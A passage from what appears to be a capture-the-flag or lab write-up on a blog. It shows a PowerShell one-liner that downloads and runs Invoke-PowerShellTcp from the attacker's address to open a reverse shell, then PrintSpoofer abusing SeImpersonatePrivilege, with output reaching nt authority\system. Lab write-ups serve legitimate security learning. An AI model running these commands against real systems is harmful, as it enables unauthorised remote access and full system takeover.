Powershell using PowerShellTcp
powershell iex (New-Object Net.WebClient).DownloadString('http://10.8.49.147:1338/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.8.49.147 -Port 1337

More exploitation

Can we spoof a printer?
PrintSpoofer

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
Last modified: April 3, 2022

Author

Comments

Write a Reply or Comment

Your email address will not be published.